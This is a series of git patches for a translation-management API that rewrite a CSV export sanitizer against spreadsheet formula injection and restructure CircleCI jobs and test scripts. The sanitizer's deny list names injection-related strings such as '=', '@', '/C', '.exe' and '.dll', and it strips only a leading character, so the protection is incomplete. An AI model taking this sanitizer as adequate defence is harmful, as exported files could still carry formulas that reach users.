2001 From: Ruslan Konviser Date: Sat, 29 Jan 2022 00:10:45 +0200 Subject: [PATCH 17/25] fix: formatting with prettier --- api/src/formatters/csv.ts | 20 +++++++++----------- 1 file changed, 9 insertions(+), 11 deletions(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index d84eaf4b..41309f6c 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -1,5 +1,5 @@ // Copyright (c) 2021-2022 Ever Co. LTD -// Modified code from https://github.com/destromas1/csv-injection-protector +// Modified code from https://github.com/destromas1/csv-injection-protector // Originally MIT Licensed // - see https://github.com/destromas1/csv-injection-protector/blob/master/LICENSE // - original code `Copyright (c) 2019 Shahjada Talukdar`; @@ -36,31 +36,29 @@ export const csvParser: Parser = async (data: string) => { }; const csvInjectionProtector = (str: string) => { - - const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d", "/C", ".exe", "\\", "/", ".dll"]; - if(!str) return ""; + const riskyChars = ['=', '+', '-', '@', ',', ';', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0x0d', '/C', '.exe', '\\', '/', '.dll']; + if (!str) return ''; riskyChars.map(risk => { - if(str.includes(risk)){ - return str = str.replace(risk, ""); + if (str.includes(risk)) { + return (str = str.replace(risk, '')); } }); return str; -} +}; export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { - const clearedTranslations = []; data.translations.map(trans => { const protectedTranslation = { term: csvInjectionProtector(trans.term), - translation: csvInjectionProtector(trans.translation) - } + translation: csvInjectionProtector(trans.translation), + }; clearedTranslations.push(protectedTranslation); }); const rows = await streamAsPromise( - stringify((clearedTranslations), { + stringify(clearedTranslations, { header: false, }), ); From 4d0e0eaed9edd9f03aca3f2a4cdf3dd212e078ec Mon Sep 17 00:00:00 2001 From: RAHUL RATHORE Date: Sat, 29 Jan 2022 13:34:09 +0530 Subject: [PATCH 18/25] fix: csv injection matching with first character of csv cell --- api/src/formatters/csv.ts | 53 ++++++++++++++------------ api/src/formatters/fixtures/simple.csv | 2 +- 2 files changed, 30 insertions(+), 25 deletions(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 41309f6c..494f2b39 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -6,7 +6,7 @@ import * as parse from 'csv-parse'; import * as stringify from 'csv-stringify'; -import { Exporter, IntermediateTranslationFormat, Parser } from '../domain/formatters'; +import { Exporter, IntermediateTranslation, IntermediateTranslationFormat, Parser } from '../domain/formatters'; const streamAsPromise = stream => { const result = []; @@ -35,32 +35,37 @@ export const csvParser: Parser = async (data: string) => { }; }; +/** + * CSV Injection – A Guide To Protecting Your CSV Files + * + * @param str + * @returns + */ const csvInjectionProtector = (str: string) => { - const riskyChars = ['=', '+', '-', '@', ',', ';', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0x0d', '/C', '.exe', '\\', '/', '.dll']; - if (!str) return ''; + const riskyChars = ['=', '+', '-', '@', ',', ';', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0x0d', '/C', '.exe', '\\', '/', '.dll']; + if (!str) return ''; - riskyChars.map(risk => { - if (str.includes(risk)) { - return (str = str.replace(risk, '')); - } - }); - - return str; + /** + * Check first character of string + */ + if (riskyChars.includes(str.charAt(0))) { + return (str = str.replace(str.charAt(0), '')); + } + return str; }; export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { - const clearedTranslations = []; - data.translations.map(trans => { - const protectedTranslation = { - term: csvInjectionProtector(trans.term), - translation: csvInjectionProtector(trans.translation), - }; - clearedTranslations.push(protectedTranslation); - }); - const rows = await streamAsPromise( - stringify(clearedTranslations, { - header: false, - }), - ); - return rows.join(''); + const clearedTranslations = data.translations.map((trans: IntermediateTranslation) => { + return { + term: csvInjectionProtector(trans.term), + translation: csvInjectionProtector(trans.translation), + }; + }); + + const rows = await streamAsPromise( + stringify(clearedTranslations, { + header: false, + }), + ); + return rows.join(''); }; diff --git a/api/src/formatters/fixtures/simple.csv b/api/src/formatters/fixtures/simple.csv index 91c9904d..e8d34c6d 100644 --- a/api/src/formatters/fixtures/simple.csv +++ b/api/src/formatters/fixtures/simple.csv @@ -1,4 +1,4 @@ term.one,Current Plan: {{ project.plan.name }} term two,"{VAR_PLURAL, plural, =0 {locales} =1 {locale} other {locales} }" TERM_THREE,Export format... -term:four,hello there you\nthis should be in a newline +term:four,hello there you\nthis should be in a newline \ No newline at end of file From 682e24f3718599f482bbf9980ec2aa663c5da52b Mon Sep 17 00:00:00 2001 From: RAHUL RATHORE Date: Sat, 29 Jan 2022 13:42:52 +0530 Subject: [PATCH 19/25] fix: formatting using Prettier --- api/src/formatters/csv.ts | 50 +++++++++++++++++++-------------------- 1 file changed, 25 insertions(+), 25 deletions(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 494f2b39..bb6f85c1 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -37,35 +37,35 @@ export const csvParser: Parser = async (data: string) => { /** * CSV Injection – A Guide To Protecting Your CSV Files - * - * @param str - * @returns + * + * @param str + * @returns */ const csvInjectionProtector = (str: string) => { - const riskyChars = ['=', '+', '-', '@', ',', ';', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0x0d', '/C', '.exe', '\\', '/', '.dll']; - if (!str) return ''; + const riskyChars = ['=', '+', '-', '@', ',', ';', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0x0d', '/C', '.exe', '\\', '/', '.dll']; + if (!str) return ''; - /** - * Check first character of string - */ - if (riskyChars.includes(str.charAt(0))) { - return (str = str.replace(str.charAt(0), '')); - } - return str; + /** + * Check first character of string + */ + if (riskyChars.includes(str.charAt(0))) { + return (str = str.replace(str.charAt(0), '')); + } + return str; }; export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { - const clearedTranslations = data.translations.map((trans: IntermediateTranslation) => { - return { - term: csvInjectionProtector(trans.term), - translation: csvInjectionProtector(trans.translation), - }; - }); - - const rows = await streamAsPromise( - stringify(clearedTranslations, { - header: false, - }), - ); - return rows.join(''); + const clearedTranslations = data.translations.map((trans: IntermediateTranslation) => { + return { + term: csvInjectionProtector(trans.term), + translation: csvInjectionProtector(trans.translation), + }; + }); + + const rows = await streamAsPromise( + stringify(clearedTranslations, { + header: false, + }), + ); + return rows.join(''); }; From 5eb53f0fe4b731a6f9f3e79d0c2cc479a4c57776 Mon Sep 17 00:00:00 2001 From: RAHUL RATHORE Date: Sat, 29 Jan 2022 13:44:15 +0530 Subject: [PATCH 20/25] fix: deepscan --- api/src/formatters/csv.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index bb6f85c1..a4878a36 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -49,7 +49,7 @@ const csvInjectionProtector = (str: string) => { * Check first character of string */ if (riskyChars.includes(str.charAt(0))) { - return (str = str.replace(str.charAt(0), '')); + return str.replace(str.charAt(0), ''); } return str; }; From 3fa3a106c2281849448d517ced5cb07daca47a1b Mon Sep 17 00:00:00 2001 From: Ruslan Konviser Date: Sat, 29 Jan 2022 14:09:22 +0200 Subject: [PATCH 21/25] feat: split unit and e2e tests as separate jobs --- .circleci/config.yml | 83 +++++++++++++++++++++++++++++++++++++++++--- bin/check_lint.sh | 34 ++++++++++++++++++ bin/test_e2e.sh | 28 +++++++++++++++ bin/test_unit.sh | 28 +++++++++++++++ 4 files changed, 169 insertions(+), 4 deletions(-) create mode 100644 bin/check_lint.sh create mode 100644 bin/test_e2e.sh create mode 100644 bin/test_unit.sh diff --git a/.circleci/config.yml b/.circleci/config.yml index 9002c658..65c7fc8e 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -1,7 +1,32 @@ version: 2 jobs: - test: + check_lint: + working_directory: ~/workspace + docker: + - image: circleci/node:14.16 + steps: + - checkout + - restore_cache: + keys: + - api-deps-{{ checksum "api/yarn.lock" }} + - webapp-deps-{{ checksum "webapp/yarn.lock" }} + - run: + name: Install deps + command: bin/install-deps.sh + - save_cache: + paths: + - ~/workspace/api/node_modules + key: api-deps-{{ checksum "api/yarn.lock" }} + - save_cache: + paths: + - ~/workspace/webapp/node_modules + key: webapp-deps-{{ checksum "webapp/yarn.lock" }} + - run: + name: Run Lint checks + command: bin/check_lint.sh + + test_unit: working_directory: ~/workspace docker: - image: circleci/node:14.16 @@ -31,7 +56,39 @@ jobs: command: dockerize -wait tcp://127.0.0.1:3306 -timeout 120s - run: name: Run tests and checks - command: bin/check.sh + command: bin/test_unit.sh + + test_e2e: + working_directory: ~/workspace + docker: + - image: circleci/node:14.16 + - image: mysql:5.7 + environment: + MYSQL_ALLOW_EMPTY_PASSWORD: "yes" + MYSQL_DATABASE: "tr_e2e" + steps: + - checkout + - restore_cache: + keys: + - api-deps-{{ checksum "api/yarn.lock" }} + - webapp-deps-{{ checksum "webapp/yarn.lock" }} + - run: + name: Install deps + command: bin/install-deps.sh + - save_cache: + paths: + - ~/workspace/api/node_modules + key: api-deps-{{ checksum "api/yarn.lock" }} + - save_cache: + paths: + - ~/workspace/webapp/node_modules + key: webapp-deps-{{ checksum "webapp/yarn.lock" }} + - run: + name: Wait for DB + command: dockerize -wait tcp://127.0.0.1:3306 -timeout 120s + - run: + name: Run tests and checks + command: bin/test_e2e.sh build: docker: @@ -51,7 +108,23 @@ workflows: - test release: jobs: - - test: + - check_lint: + filters: + branches: + ignore: /.*/ + tags: + only: /^([0-9.]+)$/ + - test_unit: + requires: + - check_lint + filters: + branches: + ignore: /.*/ + tags: + only: /^([0-9.]+)$/ + - test_e2e: + requires: + - check_lint filters: branches: ignore: /.*/ @@ -60,7 +133,9 @@ workflows: - build: context: traduora requires: - - test + - check_lint + - test_unit + - test_e2e filters: branches: ignore: /.*/ diff --git a/bin/check_lint.sh b/bin/check_lint.sh new file mode 100644 index 00000000..eea28b5c --- /dev/null +++ b/bin/check_lint.sh @@ -0,0 +1,34 @@ +#!/bin/bash + +set -e + +export TERM=xterm + +function pprint() { + local s=("$@") b w + for l in "${s[@]}"; do + ((w<${#l})) && { b="$l"; w="${#l}"; } + done + tput setaf 3 + echo "-${b//?/-}-" + for l in "${s[@]}"; do + printf '%s%*s%s\n' "$(tput setaf 2)" "-$w" "$l" + done + tput setaf 3 + echo "-${b//?/-}-" + tput sgr 0 +} + +pprint "Installing dependencies if needed" +bin/install-deps.sh + +pprint "Check code format" +yarn check-fmt + +pprint "Linting API code" +cd api && yarn lint + +pprint "Linting webapp code" +cd ../webapp && yarn lint + +pprint "All Linting checks passed!" diff --git a/bin/test_e2e.sh b/bin/test_e2e.sh new file mode 100644 index 00000000..f0dffb3c --- /dev/null +++ b/bin/test_e2e.sh @@ -0,0 +1,28 @@ +#!/bin/bash + +set -e + +export TERM=xterm + +function pprint() { + local s=("$@") b w + for l in "${s[@]}"; do + ((w<${#l})) && { b="$l"; w="${#l}"; } + done + tput setaf 3 + echo "-${b//?/-}-" + for l in "${s[@]}"; do + printf '%s%*s%s\n' "$(tput setaf 2)" "-$w" "$l" + done + tput setaf 3 + echo "-${b//?/-}-" + tput sgr 0 +} + +pprint "Installing dependencies if needed" +bin/install-deps.sh + +pprint "Running e2e tests" "Ensure you are running a local MySQL with a database called 'tr_e2e'" +cd api && yarn test:e2e + +pprint "All e2e tests passed!" diff --git a/bin/test_unit.sh b/bin/test_unit.sh new file mode 100644 index 00000000..fe7a6e1f --- /dev/null +++ b/bin/test_unit.sh @@ -0,0 +1,28 @@ +#!/bin/bash + +set -e + +export TERM=xterm + +function pprint() { + local s=("$@") b w + for l in "${s[@]}"; do + ((w<${#l})) && { b="$l"; w="${#l}"; } + done + tput setaf 3 + echo "-${b//?/-}-" + for l in "${s[@]}"; do + printf '%s%*s%s\n' "$(tput setaf 2)" "-$w" "$l" + done + tput setaf 3 + echo "-${b//?/-}-" + tput sgr 0 +} + +pprint "Installing dependencies if needed" +bin/install-deps.sh + +pprint "Running Unit Tests" "Ensure you are running a local MySQL with a database called 'tr_e2e'" +cd api && yarn test + +pprint "All Unit Tests passed!" From a7169e00f50eb8d9c3ef1255663ad62d6794dbbf Mon Sep 17 00:00:00 2001 From: Ruslan Konviser Date: Sat, 29 Jan 2022 14:11:19 +0200 Subject: [PATCH 22/25] fix: ops --- .circleci/config.yml | 23 ++++++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 65c7fc8e..2aa0102f 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -105,7 +105,28 @@ workflows: version: 2 test: jobs: - - test + - check_lint: + filters: + branches: + ignore: /.*/ + tags: + only: /^([0-9.]+)$/ + - test_unit: + requires: + - check_lint + filters: + branches: + ignore: /.*/ + tags: + only: /^([0-9.]+)$/ + - test_e2e: + requires: + - check_lint + filters: + branches: + ignore: /.*/ + tags: + only: /^([0-9.]+)$/ release: jobs: - check_lint: From 6b197578f4ce73d4e62fc1dee2034e8b323c2722 Mon Sep 17 00:00:00 2001 From: Ruslan Konviser Date: Sat, 29 Jan 2022 14:19:50 +0200 Subject: [PATCH 23/25] feat: update Circle to use Orbs --- .circleci/config.yml | 29 ++++++++++++++++++++++++----- 1 file changed, 24 insertions(+), 5 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 2aa0102f..9a736c58 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -1,12 +1,19 @@ -version: 2 +version: 2.1 + +orbs: + node: circleci/node@5.0.0 jobs: check_lint: working_directory: ~/workspace docker: - - image: circleci/node:14.16 + - image: 'cimg/base:stable' steps: - checkout + - node/install: + install-yarn: true + node-version: '16.13' + - run: node --version - restore_cache: keys: - api-deps-{{ checksum "api/yarn.lock" }} @@ -29,13 +36,17 @@ jobs: test_unit: working_directory: ~/workspace docker: - - image: circleci/node:14.16 + - image: 'cimg/base:stable' - image: mysql:5.7 environment: MYSQL_ALLOW_EMPTY_PASSWORD: "yes" MYSQL_DATABASE: "tr_e2e" steps: - checkout + - node/install: + install-yarn: true + node-version: '16.13' + - run: node --version - restore_cache: keys: - api-deps-{{ checksum "api/yarn.lock" }} @@ -61,13 +72,17 @@ jobs: test_e2e: working_directory: ~/workspace docker: - - image: circleci/node:14.16 + - image: 'cimg/base:stable' - image: mysql:5.7 environment: MYSQL_ALLOW_EMPTY_PASSWORD: "yes" MYSQL_DATABASE: "tr_e2e" steps: - checkout + - node/install: + install-yarn: true + node-version: '16.13' + - run: node --version - restore_cache: keys: - api-deps-{{ checksum "api/yarn.lock" }} @@ -92,9 +107,13 @@ jobs: build: docker: - - image: circleci/node:14.16 + - image: 'cimg/base:stable' steps: - checkout + - node/install: + install-yarn: true + node-version: '16.13' + - run: node --version - setup_remote_docker - run: name: Build From 8b71dc7a91b95ca745c6dd59be1ff33e0d294320 Mon Sep 17 00:00:00 2001 From: Ruslan Konviser Date: Sat, 29 Jan 2022 14:26:29 +0200 Subject: [PATCH 24/25] fix: run tests in feature branches too --- .circleci/config.yml | 19 +++---------------- 1 file changed, 3 insertions(+), 16 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 9a736c58..9da1db34 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -122,30 +122,17 @@ jobs: workflows: version: 2 + test: jobs: - - check_lint: - filters: - branches: - ignore: /.*/ - tags: - only: /^([0-9.]+)$/ + - check_lint - test_unit: requires: - check_lint - filters: - branches: - ignore: /.*/ - tags: - only: /^([0-9.]+)$/ - test_e2e: requires: - check_lint - filters: - branches: - ignore: /.*/ - tags: - only: /^([0-9.]+)$/ + release: jobs: - check_lint: From 452b9c674a1da2c7ff7e860bc5d319ad482eb49c Mon Sep 17 00:00:00 2001 From: Ruslan Konviser Date: Sat, 29 Jan 2022 14:34:30 +0200 Subject: [PATCH 25/25] fix: scripts permissions --- bin/check_lint.sh | 0 bin/test_e2e.sh | 0 bin/test_unit.sh | 0 3 files changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 bin/check_lint.sh mode change 100644 => 100755 bin/test_e2e.sh mode change 100644 => 100755 bin/test_unit.sh diff --git a/bin/check_lint.sh b/bin/check_lint.sh old mode 100644 new mode 100755 diff --git a/bin/test_e2e.sh b/bin/test_e2e.sh old mode 100644 new mode 100755 diff --git a/bin/test_unit.sh b/bin/test_unit.sh old mode 100644 new mode 100755